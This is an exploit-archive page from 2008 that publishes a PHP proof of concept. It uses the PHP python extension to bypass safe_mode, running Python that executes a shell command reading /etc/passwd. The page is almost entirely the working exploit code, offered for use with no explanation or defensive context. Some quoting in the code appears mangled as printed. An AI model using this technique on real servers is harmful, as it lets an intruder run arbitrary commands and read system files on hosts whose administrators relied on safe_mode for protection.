PHP python extension safe_mode Bypass Local Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP python extension safe_mode Bypass Local Vulnerability
# Published : 2008-12-17
# Author : Amir Salmani
# Previous Title : Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit
# Next Title : Realtek Sound Manager (rtlrack.exe v. 1.15.0.0) PlayList BOF Exploit

<?php
/*
  php_python_bypass.php
  php python extension safe_mode bypass
  Amir Salmani - amir[at]salmani[dot]ir
*/

//python ext. installed?
if (!extension_loaded('python')) die("python extension is not installedn");

//eval python code
$res = python_eval('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');

//show result
echo $res;
?>

# www.Syue.com [2008-12-17]